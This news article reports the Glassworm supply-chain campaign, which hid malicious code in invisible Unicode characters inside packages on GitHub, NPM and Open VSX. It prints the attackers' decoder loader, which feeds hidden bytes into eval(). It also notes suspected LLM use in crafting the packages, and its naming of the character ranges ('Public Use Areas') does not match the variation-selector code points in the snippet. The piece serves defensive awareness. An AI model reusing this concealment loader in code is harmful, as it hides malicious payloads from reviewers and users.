Supply-chain attack uses invisible Unicode code to bypass detection

Security researchers from Aikido Security discovered a supply-chain attack using invisible Unicode code to conceal malicious functions in packages uploaded to GitHub, NPM, and Open VSX. The attack group, dubbed Glassworm, uploaded 151 malicious packages to GitHub from March 3 to March 9, 2026.

How the invisible code works

The malicious packages use Unicode characters from Public Use Areas (also called Public Use Access) that are invisible when viewed in editors, terminals, and code review interfaces. While most of the code appears normal, malicious functions and payloads are rendered using these invisible characters, making manual code reviews and traditional defenses ineffective.

The invisible Unicode characters represent every letter of the US alphabet when processed by computers but display as whitespace or blank lines to humans. JavaScript interpreters can read and execute these characters as normal code.

Technical implementation

In one analyzed package, attackers encoded a malicious payload using invisible characters. The code includes a decoder function that extracts the hidden bytes and passes them to eval():

const s = v => [...v].map(
  w => (
    w = w.codePointAt(0),
    w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
    w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
    null
  )
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));

The backtick string passed to s() appears empty in viewers but contains invisible characters that decode to a full malicious payload. In previous incidents, decoded payloads fetched and executed second-stage scripts using Solana as a delivery channel to steal tokens, credentials, and secrets.

Attack characteristics

The malicious packages are particularly difficult to detect because:

• The visible portions of the code are high quality and realistic
• Surrounding changes include documentation tweaks, version bumps, small refactors, and bug fixes
• Changes are stylistically consistent with target projects
• Researchers suspect LLMs are used to generate convincingly legitimate packages

This Unicode technique was first used in 2024 to conceal malicious prompts fed to AI engines, and has since been adapted for traditional malware attacks. The 151 packages detected likely represent a small fraction of the campaign, as many have been deleted since initial upload.